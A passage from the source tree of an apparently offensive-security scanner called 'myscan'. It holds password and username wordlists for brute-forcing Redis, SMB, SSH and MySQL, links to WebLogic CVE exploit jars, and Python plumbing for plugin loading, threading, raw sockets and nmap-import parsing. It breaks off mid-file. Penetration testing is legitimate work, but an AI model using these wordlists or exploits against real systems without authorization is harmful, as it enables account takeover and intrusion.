Redis123 67 | Redis@123 68 | Root@123 69 | a123123 70 | a123456 71 | a12345678 72 | a123456789 73 | a5201314 74 | aa123456 75 | aa123456789 76 | aaa123456 77 | abc123 78 | abc123456 79 | abc123456789 80 | abcd123 81 | abcd1234 82 | abcd123456 83 | admin 84 | admin123 85 | admin@123 86 | aini1314 87 | as123456 88 | asd123 89 | asd123456 90 | asdfghjkl 91 | foobared 92 | foobared123 93 | foobared123456 94 | foobared@123 95 | password123 96 | q123456 97 | q123456789 98 | qaz123456 99 | qazwsxedc 100 | qq123456 101 | qq123456789 102 | qq5201314 103 
| qwe123 104 | qwe123456 105 | qwerty 106 | qwertyuiop 107 | redis 108 | redis123 109 | redis@123 110 | root 111 | root123 112 | root@123 113 | sunshine 114 | test 115 | test123 116 | w123456 117 | w123456789 118 | wang123456 119 | woaini 120 | woaini123 121 | !QAZ@WSX 122 | !QAZ2wsx 123 | woaini1314 124 | woaini1314520 125 | woaini520 126 | woaini521 127 | www123456 128 | z123456 129 | z123456789 130 | zxc123 131 | zxc123456 132 | zxcvbnm 133 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/mysql_user: -------------------------------------------------------------------------------- 1 | root 2 | mysql -------------------------------------------------------------------------------- /myscan/data/brute/password-top100.txt: -------------------------------------------------------------------------------- 1 | admin 2 | admin12 3 | admin888 4 | admin8 5 | admin123 6 | sysadmin 7 | adminxxx 8 | adminx 9 | 6kadmin 10 | base 11 | feitium 12 | admins 13 | root 14 | roots 15 | test 16 | test1 17 | test123 18 | test2 19 | password 20 | aaaAAA111 21 | 888888 22 | 88888888 23 | 000000 24 | 00000000 25 | 111111 26 | 11111111 27 | aaaaaa 28 | aaaaaaaa 29 | 135246 30 | 135246789 31 | 123456 32 | 654321 33 | 12345 34 | 54321 35 | 123456789 36 | 1234567890 37 | 0 38 | 123qwe 39 | 123qweasd 40 | qweasd 41 | 123asd 42 | qwezxc 43 | qazxsw 44 | qazwsx 45 | qazwsxedc 46 | 1qaz2wsx 47 | zxcvbn 48 | asdfgh 49 | qwerty 50 | qazxdr 51 | qwaszx 52 | 111111 53 | 123123 54 | 123321 55 | abcdef 56 | abcdefg 57 | !@#$%^ 58 | !@#$% 59 | ~!@#$% 60 | %$#@! 61 | ^%$#@~! 62 | 88888 63 | 55555 64 | aaaaa 65 | asd123 66 | qweasdzxc 67 | zxcvb 68 | asdfg 69 | qwert 70 | 1 71 | 2 72 | 3 73 | 4 74 | 5 75 | qwe 76 | qwer 77 | welcome 78 | !@#123 79 | 111 80 | 12 81 | 123 82 | 123!@# 83 | 123654 84 | 123654789 85 | 123654789! 
86 | 123go 87 | 1314520 88 | 133135136 89 | 13572468 90 | 19880118 91 | 1992724 92 | 20080808 93 | 3452510 94 | 360 95 | 360sb 96 | 376186027 97 | 3est 98 | 45189946 99 | 4816535 100 | 4lert -------------------------------------------------------------------------------- /myscan/data/brute/redis_pass: -------------------------------------------------------------------------------- 1 | 000000 2 | 000000000 3 | 0000000000 4 | 0000000000000000 5 | 0123456789 6 | 110120119 7 | 111111 8 | 111111111 9 | 1111111111 10 | 1111111111111111 11 | 123 12 | 123123 13 | 123123123 14 | 1233211234567 15 | 1234554321 16 | 123456 17 | 123456. 18 | 123456.. 19 | 123456789 20 | 123456789. 21 | 123456789.. 22 | 1234567890 23 | 12345678900 24 | 1234567891 25 | 12345678910 26 | 1234567891234567 27 | 1234567899 28 | 123456789a 29 | 123456789abc 30 | 123456789q 31 | 123456789qq 32 | 123456a 33 | 123456aa 34 | 123456abc 35 | 123456asd 36 | 123456q 37 | 123456qq 38 | 123698745 39 | 123abc 40 | 1314520520 41 | 135792468 42 | 1357924680 43 | 147258369 44 | 1472583690 45 | 19881230 46 | 1qaz2wsx 47 | 253013 48 | 5201314 49 | 5201314520 50 | 52013145201314 51 | 5841314520 52 | 741852963 53 | 7708801314520 54 | 789456123 55 | 7894561230 56 | 987654321 57 | 9876543210 58 | Passw0rd 59 | Password 60 | Password123 61 | Redis 62 | Redis123 63 | Redis@123 64 | Root@123 65 | a123123 66 | a123456 67 | a12345678 68 | a123456789 69 | a5201314 70 | aa123456 71 | aa123456789 72 | aaa123456 73 | abc123 74 | abc123456 75 | abc123456789 76 | abcd123 77 | abcd1234 78 | abcd123456 79 | admin 80 | admin123 81 | admin@123 82 | aini1314 83 | as123456 84 | asd123 85 | asd123456 86 | asdfghjkl 87 | foobared 88 | foobared123 89 | foobared123456 90 | foobared@123 91 | password123 92 | q123456 93 | q123456789 94 | qaz123456 95 | qazwsxedc 96 | qq123456 97 | qq123456789 98 | qq5201314 99 | qwe123 100 | qwe123456 101 | qwerty 102 | qwertyuiop 103 | redis 104 | redis123 105 | redis@123 106 | root 107 | root123 108 | 
root@123 109 | sunshine 110 | test 111 | test123 112 | w123456 113 | w123456789 114 | wang123456 115 | woaini 116 | woaini123 117 | !QAZ@WSX 118 | woaini1314 119 | woaini1314520 120 | woaini520 121 | woaini521 122 | www123456 123 | z123456 124 | z123456789 125 | zxc123 126 | zxc123456 127 | zxcvbnm 128 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/smb_pass: -------------------------------------------------------------------------------- 1 | 000000 2 | 000000000 3 | 0000000000 4 | 0000000000000000 5 | 0123456789 6 | 110120119 7 | 111111 8 | 111111111 9 | 1111111111 10 | 1111111111111111 11 | 123 12 | 123123 13 | 123123123 14 | 1233211234567 15 | 1234554321 16 | 123456 17 | 123456. 18 | 123456.. 19 | 123456789 20 | 123456789. 21 | 123456789.. 22 | 1234567890 23 | 12345678900 24 | 1234567891 25 | 12345678910 26 | 1234567891234567 27 | 1234567899 28 | 123456789a 29 | 123456789abc 30 | 123456789q 31 | 123456789qq 32 | 123456a 33 | 123456aa 34 | 123456abc 35 | 123456asd 36 | 123456q 37 | 123456qq 38 | 123698745 39 | 123abc 40 | 1314520520 41 | 135792468 42 | 1357924680 43 | 147258369 44 | 1472583690 45 | 19881230 46 | 1qaz2wsx 47 | 253013 48 | 5201314 49 | 5201314520 50 | 52013145201314 51 | 5841314520 52 | 741852963 53 | 7708801314520 54 | 789456123 55 | 7894561230 56 | 987654321 57 | 9876543210 58 | Passw0rd 59 | Password 60 | Password123 61 | Redis 62 | Redis123 63 | Redis@123 64 | Root@123 65 | a123123 66 | a123456 67 | a12345678 68 | a123456789 69 | a5201314 70 | aa123456 71 | aa123456789 72 | aaa123456 73 | abc123 74 | abc123456 75 | abc123456789 76 | abcd123 77 | abcd1234 78 | abcd123456 79 | admin 80 | admin123 81 | admin@123 82 | aini1314 83 | as123456 84 | asd123 85 | asd123456 86 | asdfghjkl 87 | foobared 88 | foobared123 89 | foobared123456 90 | foobared@123 91 | password123 92 | q123456 93 | q123456789 94 | qaz123456 95 | qazwsxedc 96 | qq123456 97 | qq123456789 98 | qq5201314 99 | qwe123 100 
| qwe123456 101 | qwerty 102 | qwertyuiop 103 | redis 104 | redis123 105 | redis@123 106 | root 107 | root123 108 | root@123 109 | sunshine 110 | test 111 | test123 112 | w123456 113 | w123456789 114 | wang123456 115 | woaini 116 | woaini123 117 | !QAZ@WSX 118 | !QAZ2wsx 119 | woaini1314 120 | woaini1314520 121 | woaini520 122 | woaini521 123 | www123456 124 | z123456 125 | z123456789 126 | zxc123 127 | zxc123456 128 | zxcvbnm 129 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/smb_user: -------------------------------------------------------------------------------- 1 | administrator -------------------------------------------------------------------------------- /myscan/data/brute/ssh_pass: -------------------------------------------------------------------------------- 1 | 000000 2 | 000000000 3 | 0000000000 4 | 0000000000000000 5 | 0123456789 6 | 110120119 7 | 111111 8 | 111111111 9 | 1111111111 10 | 1111111111111111 11 | 123 12 | 123123 13 | 123123123 14 | 1233211234567 15 | 1234554321 16 | 123456 17 | 123456. 18 | 123456.. 19 | 123456789 20 | 123456789. 21 | 123456789.. 
22 | 1234567890 23 | 12345678900 24 | 1234567891 25 | 12345678910 26 | 1234567891234567 27 | 1234567899 28 | 123456789a 29 | 123456789abc 30 | 123456789q 31 | 123456789qq 32 | 123456a 33 | 123456aa 34 | 123456abc 35 | 123456asd 36 | 123456q 37 | 123456qq 38 | 123698745 39 | 123abc 40 | 1314520520 41 | 135792468 42 | 1357924680 43 | 147258369 44 | 1472583690 45 | 19881230 46 | 1qaz2wsx 47 | 253013 48 | 5201314 49 | 5201314520 50 | 52013145201314 51 | 5841314520 52 | 741852963 53 | 7708801314520 54 | 789456123 55 | 7894561230 56 | 987654321 57 | 9876543210 58 | Passw0rd 59 | Password 60 | Password123 61 | Redis 62 | Redis123 63 | Redis@123 64 | Root@123 65 | a123123 66 | a123456 67 | a12345678 68 | a123456789 69 | a5201314 70 | aa123456 71 | aa123456789 72 | aaa123456 73 | abc123 74 | abc123456 75 | abc123456789 76 | abcd123 77 | abcd1234 78 | abcd123456 79 | admin 80 | admin123 81 | admin@123 82 | aini1314 83 | as123456 84 | asd123 85 | asd123456 86 | asdfghjkl 87 | foobared 88 | foobared123 89 | foobared123456 90 | foobared@123 91 | password123 92 | q123456 93 | q123456789 94 | qaz123456 95 | qazwsxedc 96 | qq123456 97 | qq123456789 98 | qq5201314 99 | qwe123 100 | qwe123456 101 | qwerty 102 | qwertyuiop 103 | redis 104 | redis123 105 | redis@123 106 | root 107 | root123 108 | root@123 109 | sunshine 110 | test 111 | test123 112 | w123456 113 | w123456789 114 | wang123456 115 | woaini 116 | woaini123 117 | !QAZ@WSX 118 | !QAZ2wsx 119 | woaini1314 120 | woaini1314520 121 | woaini520 122 | woaini521 123 | www123456 124 | z123456 125 | z123456789 126 | zxc123 127 | zxc123456 128 | zxcvbnm 129 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/ssh_user: -------------------------------------------------------------------------------- 1 | root -------------------------------------------------------------------------------- /myscan/data/common/dns_servers.txt: 
-------------------------------------------------------------------------------- 1 | 119.29.29.29 2 | 114.114.114.114 3 | 223.5.5.5 4 | 180.76.76.76 5 | 101.6.6.6 -------------------------------------------------------------------------------- /myscan/htmllib/prism-http.min.js: -------------------------------------------------------------------------------- 1 | Prism.languages.http={"request-line":{pattern:/^(POST|GET|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT)\b\shttps?:\/\/\S+\sHTTP\/[0-9.]+/,inside:{property:/^\b(POST|GET|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT)\b/,"attr-name":/:\w+/}},"response-status":{pattern:/^HTTP\/1.[01] [0-9]+.*/,inside:{property:/[0-9]+[A-Z\s-]+$/i}},keyword:/^[\w-]+:(?=.+)/m};var httpLanguages={"application/json":Prism.languages.javascript,"application/xml":Prism.languages.markup,"text/xml":Prism.languages.markup,"text/html":Prism.languages.markup};for(var contentType in httpLanguages)if(httpLanguages[contentType]){var options={};options[contentType]={pattern:new RegExp("(content-type:\\s*"+contentType+"[\\w\\W]*?)\\n\\n[\\w\\W]*","i"),lookbehind:!0,inside:{rest:httpLanguages[contentType]}},Prism.languages.insertBefore("http","keyword",options)} -------------------------------------------------------------------------------- /myscan/htmllib/prism-javascript.min.js: -------------------------------------------------------------------------------- 1 | 
Prism.languages.javascript=Prism.languages.extend("clike",{keyword:/\b(break|case|catch|class|const|continue|debugger|default|delete|do|else|enum|export|extends|false|finally|for|function|get|if|implements|import|in|instanceof|interface|let|new|null|package|private|protected|public|return|set|static|super|switch|this|throw|true|try|typeof|var|void|while|with|yield)\b/,number:/\b-?(0x[\dA-Fa-f]+|\d*\.?\d+([Ee][+-]?\d+)?|NaN|-?Infinity)\b/,"function":/(?!\d)[a-z0-9_$]+(?=\()/i}),Prism.languages.insertBefore("javascript","keyword",{regex:{pattern:/(^|[^/])\/(?!\/)(\[.+?]|\\.|[^/\r\n])+\/[gim]{0,3}(?=\s*($|[\r\n,.;})]))/,lookbehind:!0}}),Prism.languages.markup&&Prism.languages.insertBefore("markup","tag",{script:{pattern:/[\w\W]*?<\/script>/i,inside:{tag:{pattern:/|<\/script>/i,inside:Prism.languages.markup.tag.inside},rest:Prism.languages.javascript},alias:"language-javascript"}}); -------------------------------------------------------------------------------- /myscan/htmllib/prism.min.css: -------------------------------------------------------------------------------- 1 | code[class*="language-"],pre[class*="language-"]{color:black;text-shadow:0 1px white;font-family:Consolas,Monaco,'Andale Mono',monospace;direction:ltr;text-align:left;white-space:pre;word-spacing:normal;word-break:normal;line-height:1.5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-hyphens:none;-moz-hyphens:none;-ms-hyphens:none;hyphens:none}pre[class*="language-"]::-moz-selection,pre[class*="language-"] ::-moz-selection,code[class*="language-"]::-moz-selection,code[class*="language-"] ::-moz-selection{text-shadow:none;background:#b3d4fc}pre[class*="language-"]::selection,pre[class*="language-"] ::selection,code[class*="language-"]::selection,code[class*="language-"] ::selection{text-shadow:none;background:#b3d4fc}@media print{code[class*="language-"],pre[class*="language-"]{text-shadow:none}}pre[class*="language-"]{padding:1em;margin:.5em 
0;overflow:auto}:not(pre)>code[class*="language-"],pre[class*="language-"]{background:#f5f2f0}:not(pre)>code[class*="language-"]{padding:.1em;border-radius:.3em}.token.comment,.token.prolog,.token.doctype,.token.cdata{color:slategray}.token.punctuation{color:#999}.namespace{opacity:.7}.token.property,.token.tag,.token.boolean,.token.number,.token.constant,.token.symbol,.token.deleted{color:#905}.token.selector,.token.attr-name,.token.string,.token.char,.token.builtin,.token.inserted{color:#690}.token.operator,.token.entity,.token.url,.language-css .token.string,.style .token.string{color:#a67f59;background:hsla(0,0,100%,.5)}.token.atrule,.token.attr-value,.token.keyword{color:#07a}.token.function{color:#dd4a68}.token.regex,.token.important,.token.variable{color:#e90}.token.important,.token.bold{font-weight:bold}.token.italic{font-style:italic}.token.entity{cursor:help} -------------------------------------------------------------------------------- /myscan/lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/__init__.py -------------------------------------------------------------------------------- /myscan/lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/__init__.pyc -------------------------------------------------------------------------------- /myscan/lib/bin/weblogic/CVE-2020-14645.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/bin/weblogic/CVE-2020-14645.jar -------------------------------------------------------------------------------- /myscan/lib/bin/weblogic/CVE-2020-2555.jar: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/bin/weblogic/CVE-2020-2555.jar -------------------------------------------------------------------------------- /myscan/lib/bin/weblogic/CVE-2020-2883.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/bin/weblogic/CVE-2020-2883.jar -------------------------------------------------------------------------------- /myscan/lib/controller/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/controller/__init__.py -------------------------------------------------------------------------------- /myscan/lib/core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/core/__init__.py -------------------------------------------------------------------------------- /myscan/lib/core/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/core/__init__.pyc -------------------------------------------------------------------------------- /myscan/lib/core/base.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-06-09 3 | # @Author : caicai 4 | # @File : base.py 5 | 6 | ''' 7 | poc的父类,继承一些通用方法 8 | ''' 9 | from myscan.lib.core.common import getmd5, getredis 10 | from myscan.lib.core.data import logger 11 | 12 | class PocBase(object): 13 | 14 | def can_output(self, msg, insert=False): 15 | 
''' 16 | msg : should url+somename 17 | ''' 18 | 19 | msgmd5 = getmd5(msg) 20 | red = getredis() 21 | if insert == False: 22 | if not red.sismember("myscan_max_output", msgmd5): 23 | return True # 可以输出 24 | else: 25 | logger.debug("{} 输出个数已达一次,不再测试输出".format(msg)) 26 | return False # 不可以继续输出 27 | else: 28 | # red.hincrby("myscan_max_output", msgmd5, amount=1) 29 | red.sadd("myscan_max_output", msgmd5) 30 | -------------------------------------------------------------------------------- /myscan/lib/core/block_info.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : block_info.py 5 | from myscan.lib.core.common import getredis 6 | from myscan.config import scan_set 7 | from myscan.lib.core.data import logger 8 | 9 | 10 | class block_info(): 11 | def __init__(self, host, port): 12 | self.red = getredis() 13 | self.host_port = "{}_{}".format(host, port) 14 | self.count_res_key = "count_res_{}".format(self.host_port) # list 15 | self.block_key = "block" # set 16 | 17 | def push_result_status(self, status): 18 | ''' 19 | status [0,1] 20 | 0:状态正常 21 | 1:状态异常 22 | ''' 23 | # 查看主机是否被封算法 24 | # 把主机(host_port)最近两百个结果保存到redis,统计最近两百个结果timeout次数,达到80及为主机被封,不再处理。 25 | if not self.red.exists(self.count_res_key): 26 | for x in range(int(scan_set.get("block_count"))): 27 | self.red.rpush(self.count_res_key, "0") 28 | self.red.lpush(self.count_res_key, str(status)) 29 | self.red.ltrim(self.count_res_key, 0, int(scan_set.get("block_count")) - 1) 30 | r = self.red.lrange(self.count_res_key, 0, -1) 31 | error_nums = r.count(b"1") 32 | if error_nums >= int(scan_set.get("block_count")): 33 | if self.red.sadd(self.block_key, self.host_port) == 1: 34 | self.red.hincrby("count_all", "block_host", amount=1) 35 | logger.warning("{} blocked,never test it ".format(self.host_port)) 36 | return error_nums 37 | 38 | def is_block(self): 39 | if self.red.sismember(self.block_key, 
self.host_port): 40 | return True 41 | else: 42 | return False 43 | 44 | def block_it(self): 45 | self.red.sadd(self.block_key, self.host_port) 46 | -------------------------------------------------------------------------------- /myscan/lib/core/data.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : data.py 5 | from myscan.lib.core.datatype import AttribDict 6 | from myscan.lib.core.log import Logger 7 | 8 | cmd_line_options = AttribDict() 9 | 10 | paths = AttribDict() 11 | 12 | logger = Logger(logger="myscan") 13 | 14 | conn = AttribDict() 15 | 16 | count = AttribDict() 17 | 18 | others= AttribDict() 19 | -------------------------------------------------------------------------------- /myscan/lib/core/datatype.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : datatype.py 5 | from collections import OrderedDict 6 | import copy 7 | import types 8 | 9 | class AttribDict(OrderedDict): 10 | """ 11 | AttrDict extends OrderedDict to provide attribute-style access. 12 | Items starting with __ or _OrderedDict__ can't be accessed as attributes. 
13 | """ 14 | __exclude_keys__ = set() 15 | 16 | def __getattr__(self, name): 17 | if (name.startswith('__') 18 | or name.startswith('_OrderedDict__') 19 | or name in self.__exclude_keys__): 20 | return super(AttribDict, self).__getattribute__(name) 21 | else: 22 | try: 23 | return self.get(name) 24 | except KeyError: 25 | raise AttributeError(name) 26 | 27 | def __setattr__(self, name, value): 28 | if (name.startswith('__') 29 | or name.startswith('_OrderedDict__') 30 | or name in self.__exclude_keys__): 31 | return super(AttribDict, self).__setattr__(name, value) 32 | self[name] = value 33 | 34 | def __delattr__(self, name): 35 | if (name.startswith('__') 36 | or name.startswith('_OrderedDict__') 37 | or name in self.__exclude_keys__): 38 | return super(AttribDict, self).__delattr__(name) 39 | del self[name] 40 | def __getstate__(self): 41 | return self.__dict__ 42 | 43 | def __setstate__(self, dict): 44 | self.__dict__ = dict 45 | 46 | # def __deepcopy__(self, memo): 47 | # retVal = self.__class__() 48 | # memo[id(self)] = retVal 49 | # 50 | # for attr in dir(self): 51 | # if not attr.startswith('_'): 52 | # value = getattr(self, attr) 53 | # if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): 54 | # setattr(retVal, attr, copy.deepcopy(value, memo)) 55 | # 56 | # for key, value in self.items(): 57 | # retVal.__setitem__(key, copy.deepcopy(value, memo)) 58 | # 59 | # return retVal 60 | -------------------------------------------------------------------------------- /myscan/lib/core/plugin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : languages.py 5 | from myscan.lib.core.data import cmd_line_options, paths, logger 6 | from myscan.lib.core.register import load_file_to_module 7 | import copy 8 | import traceback 9 | 10 | 11 | class plugin(): 12 | def __init__(self, dictdata): 13 | self.dictdata = 
dictdata 14 | self.run() 15 | 16 | def run(self): 17 | for plugin in cmd_line_options.open_lugins: 18 | try: 19 | c = load_file_to_module(plugin) 20 | class_plugin = c.plugin(copy.deepcopy(self.dictdata)) 21 | logger.debug("Start languages script:{}".format(plugin)) 22 | class_plugin.run() 23 | logger.debug("Done languages script:{}".format(plugin)) 24 | except Exception as ex: 25 | traceback.print_exc() 26 | logger.warning("run languages script:{} error:{}".format(plugin, ex)) 27 | -------------------------------------------------------------------------------- /myscan/lib/core/pythonplugin.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/5 3 | # @Author : caicai 4 | # @File : pythonplugin.py 5 | 6 | 7 | from myscan.lib.core.data import cmd_line_options 8 | import json 9 | from myscan.lib.core.common import getredis 10 | from myscan.lib.core.data import logger 11 | import traceback 12 | 13 | 14 | class python_plugin(): 15 | def __init__(self, workdata): 16 | self.workdata = workdata 17 | self.red = getredis() 18 | 19 | def run(self): 20 | dictdata = json.loads(self.red.hget(self.workdata.get("id"), "data")) 21 | # count==0 则删除,防止内存过大 22 | current_count = self.red.hincrby(self.workdata.get("id"), "count", amount=-1) 23 | if current_count == 0: 24 | logger.debug("Will delete data for id:{}".format(self.workdata.get("id"))) 25 | self.red.delete(self.workdata.get("id")) 26 | 27 | # self.workdata["dictdata"] = copy.deepcopy(dictdata) 28 | self.poc = self.workdata.get("poc") 29 | 30 | func_data = cmd_line_options.allow_plugin[self.workdata.get('pochash')].get("class", None) 31 | if func_data is None: 32 | logger.warning("{} poc not found,will kill this task".format(self.poc)) 33 | return 34 | func = func_data.POC 35 | class_poc = func(dictdata) 36 | logger.debug("Start python plugin script:{} ".format(self.poc)) 37 | try: 38 | class_poc.verify() 39 | # process = 
psutil.Process(os.getpid()) # os.getpid() 40 | # memInfo = process.memory_info() 41 | # print('pid: {}'.format(os.getpid()), int(memInfo.rss / 1024 / 1014), 'mb on {}'.format(os.path.basename(self.poc))) 42 | 43 | logger.debug("Done python plugin script:{} ".format(self.poc)) 44 | except Exception as ex: 45 | traceback.print_exc() 46 | -------------------------------------------------------------------------------- /myscan/lib/core/register.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : register.py 5 | import os 6 | from importlib import util 7 | from myscan.lib.core.data import logger 8 | 9 | 10 | def load_file_to_module(file_path): 11 | file_path = os.path.abspath(file_path) 12 | if not os.path.exists(file_path): 13 | logger.warning("load file error ,file no exist.") 14 | return 15 | try: 16 | module_name = 'pocs_{0}'.format(get_filename(file_path, with_ext=False)) 17 | spec = util.spec_from_file_location(module_name, file_path) 18 | mod = util.module_from_spec(spec) 19 | spec.loader.exec_module(mod) 20 | return mod 21 | 22 | except ImportError: 23 | error_msg = "load module failed! 
'{}'".format(file_path) 24 | raise 25 | 26 | 27 | def get_filename(filepath, with_ext=True): 28 | base_name = os.path.basename(filepath) 29 | return base_name if with_ext else os.path.splitext(base_name)[0] 30 | -------------------------------------------------------------------------------- /myscan/lib/core/threads.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : threads.py 5 | import threading 6 | # import traceback 7 | from queue import Queue 8 | from myscan.lib.core.data import logger 9 | from myscan.lib.core.data import cmd_line_options 10 | 11 | 12 | def mythread(func, mapslist, thread_num=None): 13 | threads = [] 14 | queue = Queue() 15 | for i in mapslist: 16 | queue.put(i) 17 | if thread_num is None: 18 | thread_num = cmd_line_options.threads 19 | for x in range(0, int(thread_num)): 20 | threads.append(tThread(queue, func)) 21 | 22 | for t in threads: 23 | t.start() 24 | for t in threads: 25 | t.join() 26 | 27 | 28 | class tThread(threading.Thread): 29 | def __init__(self, queue, func): 30 | threading.Thread.__init__(self) 31 | self.queue = queue 32 | self.func = func 33 | 34 | def run(self): 35 | 36 | while not self.queue.empty(): 37 | arg = self.queue.get() 38 | try: 39 | self.func(arg) 40 | except Exception as e: 41 | logger.warning("run thread error:{}".format(str(e))) 42 | # traceback.print_exc() 43 | -------------------------------------------------------------------------------- /myscan/lib/helper/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/helper/__init__.py -------------------------------------------------------------------------------- /myscan/lib/helper/helper_socket.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 
2 | # @Time : 2020-02-26 3 | # @Author : caicai 4 | # @File : helper_socket.py 5 | import socket 6 | import ssl 7 | 8 | 9 | def socket_send(data, address, timeout=8, recv_len=4096): 10 | ''' 11 | data: bytes 12 | address: list (ip,port) 13 | ''' 14 | res = None 15 | try: 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | sock.settimeout(timeout) 18 | sock.connect(address) 19 | sock.send(data) 20 | res = sock.recv(recv_len) 21 | sock.close() 22 | except Exception as ex: 23 | pass 24 | # ("socket_send get error:{}".format(ex)) 25 | return res 26 | 27 | 28 | def socket_send_withssl(data, address, timeout=8, recv_len=4096): 29 | ''' 30 | data: bytes 31 | address: list (ip,port) 32 | ''' 33 | res = None 34 | context = ssl._create_unverified_context() 35 | try: 36 | with socket.create_connection(address) as conn: 37 | with context.wrap_socket(conn) as sconn: 38 | sconn.settimeout(timeout) 39 | sconn.send(data) 40 | res = sconn.recv(recv_len) 41 | except Exception as ex: 42 | pass 43 | # log("socket_send_withssl get error:{}".format(ex)) 44 | return res -------------------------------------------------------------------------------- /myscan/lib/hostscan/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/common.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.core.data import logger 2 | import subprocess 3 | 4 | 5 | def get_data_from_file(filename): 6 | lines = [] 7 | try: 8 | with open(filename, errors="ignore") as f: 9 | for line in f: 10 | line = line.strip() 11 | if line: 12 | lines.append(line) 13 | except Exception as ex: 14 | logger.warning("get_data_from_file get error:{}".format(ex)) 15 | return lines 16 | 17 | 18 | # def get_class_from_jvm(jarpath,classname): 19 | # if not jpype.isJVMStarted(): 20 | # jvm_path = jpype.getDefaultJVMPath() 21 | 
# jpype.startJVM(jvm_path, "-Djava.class.path={}".format(jarpath), 22 | # convertStrings=True) 23 | # javaClass = jpype.JClass(classname) 24 | # return javaClass 25 | def start_process(args: list, timeout: int = 30): 26 | try: 27 | ret = subprocess.check_output(args, timeout) 28 | except subprocess.CalledProcessError as ex: 29 | return ex.output # Output generated before error 30 | return ret 31 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/input_sour/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/input_sour/from_json_import.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/7/30 3 | # @Author : caicai 4 | # @File : from_json_import.py 5 | 6 | 7 | import json 8 | 9 | 10 | def get_data_from_jsonfile(filename): 11 | datas = [] 12 | with open(filename, errors="ignore") as f: 13 | lines = f.readlines() 14 | for line in lines: 15 | try: 16 | dic = json.loads(line.strip()) 17 | datas.append( 18 | { 19 | "filter": dic.get("filter", True), 20 | "scan": dic.get("scan", False), 21 | "addr": str(dic.get("addr")), 22 | "port": int(dic.get("port")), 23 | "type": dic.get("type", "tcp"), 24 | "service": dic.get("service") 25 | } 26 | ) 27 | 28 | except Exception as e: 29 | print("process get_data_from_jsonfile error: {}".format(e)) 30 | return datas 31 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/input_sour/from_nmap_text_import.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | 4 | def get_data_from_textfile(filename): 5 | datas = [] 6 | with open(filename,errors="ignore") as f: 7 | texts = f.read() 8 | hostsdata = re.findall( 9 | '(scan report.*?)Nmap', texts, re.S 10 | ) 11 
| for host in hostsdata: 12 | ip = '' 13 | for line in host.split('\n'): 14 | if 'scan report for' in line: 15 | ip = line.split(' ')[3] 16 | elif '/tcp' in line or '/udp' in line: 17 | linesplit = re.split('\s+', line) 18 | try: 19 | port, service, version = linesplit[0], linesplit[2], ' '.join(linesplit[3:]) 20 | p,t=port.split("/",1) 21 | if re.search(".*?ttl \d{1,4}", version.strip()): 22 | version = re.search(".*?ttl \d{1,4}(.*?$)", version.strip()).group(1).strip() 23 | datas.append( 24 | { 25 | "filter": True, 26 | "scan": False, 27 | "addr": ip, 28 | "port": int(p), 29 | "type":t, 30 | "service": { 31 | service: version 32 | } 33 | 34 | } 35 | ) 36 | 37 | except Exception as e: 38 | print("process get_data_from_textfile error: {}".format(e)) 39 | return datas 40 | 41 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/input_sour/from_nmap_xml_import.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/pocbase.py: -------------------------------------------------------------------------------- 1 | class 